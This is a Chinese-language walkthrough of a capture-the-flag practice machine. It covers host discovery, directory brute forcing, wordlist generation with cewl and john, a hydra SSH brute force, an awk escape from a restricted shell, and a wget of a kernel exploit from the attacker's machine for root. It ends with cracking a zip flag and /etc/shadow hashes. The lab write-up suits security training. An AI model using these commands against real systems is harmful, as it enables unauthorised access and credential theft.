靶機滲透


練習靶機的好處可以讓你在接觸實操的時候不會手忙腳亂不知道該先怎么用,光知道理論永遠成為不了一個優秀的大牛.

靶機下載地址

https://pan.baidu.com/s/1wTPr1dr1hi1lzTFFu3u3Cg提取碼:778f

導入靶機后用pingman掃描靶機ip

!/bin/bashif [ "$1" == "" ] thenecho "Usage:./pingman.sh [betwork]"echo "Example:./pingman.sh 192.168.1"elsefor ip in `seq 1 254`; do ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | sed 's/.$//' & donefi

此處ip

靶機:192.168.1.3

kali:192.168.1.5

第一步nmap掃

nmap -A -sS -Pn -p- 192.168.1.3

1

這里可以看到靶機只有ssh和apache兩個服務

進入192.168.1.3:8180可以看到一個nginx初始網頁

2

沒有什么可以看到的好東西

dirb目錄爆破

由於用dirb http://192.168.1.3:8180/也爆不出什么可用網頁於是用工具自帶的大字典進行爆破

locate dirb—–查看有關dirb的目錄位置

big.txt可以用這個找到

img

這里可以看到apache指定網頁的存放路徑

我們將自己的hosts文件中的加上域名

192.168.1.3 mario.supermariohost.local

img

這里是一個沒有馬里奧的游戲

由於個人原因,這里靶機ip為192.168.36.195

因為上面的東西也沒有什么特別有價值的所以我們用御劍再爆一次

dirbuster

img

這里發現了兩個新的網頁

command是一個查詢用戶名的界面,這個界面可以想想之前的ssh服務說不定是這個用戶名登錄的

luigi里面是一封信

…截圖太麻煩所以這里兩個頁面留給大家自己實踐去查看

這里不知道為什么在command.php中怎么也爆不出用戶名(可能是作者故意設置的一個坑)

字典生成

cewl mario.supermariohost.local:8180/luigi.php -w /root/user.txt

img

john --wordlist=user.txt --stdout --rules >pass.txt

img

有了字典之后我們就能進行ssh爆破了

hydra ssh爆破

hydra -L user.txt -P pass.txt 192.168.36.195 ssh -t 4 -V

這個過程有點長…..

img

有了帳號密碼當然ssh連接看看呀

img

這里發現有些命令執行不了,管理員做了限制.在終端輸入?查看可以使用的命令有awk.好嘞,你等着!!!

awk權限繞過

awk 'BEGIN{system("/bin/bash")}'

img

成功繞過后我們查看內核版本信息,發現是3.13.0的老系統,回到kali找exp進行提權

img

靶機下載做好的提權腳本

wget 192.168.36.208/exp3.13

img

有了root權限后使用python切換shell

python -c 'import pty;pty.spawn("/bin/bash")'

在/root下找到flag.zip,發現有密碼,繼續放到kali進行解密

img

zip解密

fcrackzip -D -p rockyou.txt -u /root/flag.zip

img

查看flag

img

這里作者最后讓我們把所以的密碼都明文解密出來

把/etc/shadow下的root mario luigi copy出來放到kali進行john解密

john --wordlist=rockyou.txt userpass.txt

好了所有的內容都做完了,整理總結,最后密碼懶得發圖,交給大家自己實踐了,哈哈哈


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM